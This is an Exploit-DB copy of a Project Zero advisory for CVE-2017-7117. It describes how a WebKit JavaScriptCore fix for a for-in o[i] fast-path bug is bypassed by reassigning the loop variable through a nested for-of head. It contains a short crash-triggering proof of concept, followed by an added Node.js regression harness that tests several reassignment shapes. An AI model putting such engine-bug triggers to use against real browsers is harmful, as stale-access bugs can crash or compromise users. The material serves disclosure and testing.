WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)

EDB-ID: 42955
Author: Google Security Research
Published: 2017-10-04
CVE: CVE-2017-7117
Type: DoS
Platform: Multiple

 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319 

The following PoC bypasses the fix for issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263). In that issue, BytecodeGenerator::emitGetByVal compiled `o[i]`, where `i` is the variable of an enclosing for-in loop, with a fast path that assumes `i` still holds the property name currently being enumerated; the fix invalidates that fast path when it sees an assignment to `i` inside the loop body. Here `i` is reassigned through the head of a nested `for...of` loop rather than by a plain assignment, so the reassignment is not recognised and `o[i]` is still compiled with the fast path even though `i` now holds the number 0 instead of the enumerated key.

PoC:

function f() {
    let o = {};
    // `i` is the for-in loop variable, so `o[i]` below is a candidate for the
    // for-in fast path, which assumes `i` still holds the enumerated key "xx".
    for (let i in {xx: 0}) {
        // Reassign `i` (to the number 0) through the head of a nested for-of
        // loop instead of a plain `i = 0`, which the fix for issue 1263
        // would have caught.
        for (i of [0]) {
        }

        // `i` is now 0, not the string "xx", but the optimized access still
        // treats it as the enumerated property name.
        // `print` is the jsc shell's output function.
        print(o[i]);
    }
}

f();
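The PoC above only shows the one shape that slipped past the fix. As an added example (not part of the Project Zero report or of WebKit), the harness below runs several syntactic ways of reassigning a for-in loop variable before it is used as the key of `o[i]` and checks that the engine evaluates the access with the variable's current value. The function and variable names are assumed, the objects `SRC` and the target returned by `makeTarget()` are constructed test data, and the code is written for Node.js; on an engine that still compiles `o[i]` with the stale for-in fast path, the for-of variant (the shape of this PoC) would return the wrong value or crash rather than "reassigned".

```javascript
// Regression harness for the for-in `o[i]` fast path. Added example, not code
// from the Project Zero report. Every variant enumerates the single property
// of SRC with for-in, overwrites the loop variable `i` in a different
// syntactic way, then reads `o[i]`. A correct engine must evaluate `o[i]`
// with the *current* value of `i` (key 0), so every variant must return
// "reassigned". An engine that still uses the for-in enumerator fast path
// for `o[i]` would read a stale slot, return the wrong value, or crash.

const SRC = { xx: 0 };   // constructed: the object enumerated by for-in

function makeTarget() {
  // constructed: holds both the enumerated key and the key `i` is reassigned to
  return { xx: "stale", 0: "reassigned" };
}

// Variant 1: plain assignment in the loop body (the shape of issue 1263).
function plainAssignment() {
  const o = makeTarget();
  let result;
  for (let i in SRC) {
    i = 0;
    result = o[i];
  }
  return result;
}

// Variant 2: reassignment through the head of a nested for-of loop
// (the shape of issue 1319, the bypass of the 1263 fix).
function forOfHeadAssignment() {
  const o = makeTarget();
  let result;
  for (let i in SRC) {
    for (i of [0]) { }
    result = o[i];
  }
  return result;
}

// Variant 3: reassignment through the head of a nested for-in loop.
function forInHeadAssignment() {
  const o = makeTarget();
  let result;
  for (let i in SRC) {
    for (i in { 0: 1 }) { }
    result = o[i];
  }
  return result;
}

// Variant 4: reassignment through array destructuring.
function destructuringAssignment() {
  const o = makeTarget();
  let result;
  for (let i in SRC) {
    [i] = [0];
    result = o[i];
  }
  return result;
}

// Variant 5: reassignment from a closure that captures `i`.
function closureAssignment() {
  const o = makeTarget();
  let result;
  for (let i in SRC) {
    const set = () => { i = 0; };
    set();
    result = o[i];
  }
  return result;
}

const VARIANTS = {
  plainAssignment,
  forOfHeadAssignment,
  forInHeadAssignment,
  destructuringAssignment,
  closureAssignment,
};

// Run every variant and return a description of each one that violates the
// expected semantics. An empty array means the engine handled all shapes.
function runAll() {
  const failures = [];
  for (const [name, fn] of Object.entries(VARIANTS)) {
    let got;
    try { got = fn(); } catch (e) { got = `threw ${e}`; }
    if (got !== "reassigned") failures.push(`${name}: got ${String(got)}`);
  }
  return failures;
}

const failures = runAll();
console.log(failures.length === 0 ? "all variants OK" : failures);
```

Run it with `node` against the engine under test; the variants are independent, so a failure list pinpoints which reassignment shape the bytecode generator failed to treat as an assignment to the for-in variable.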
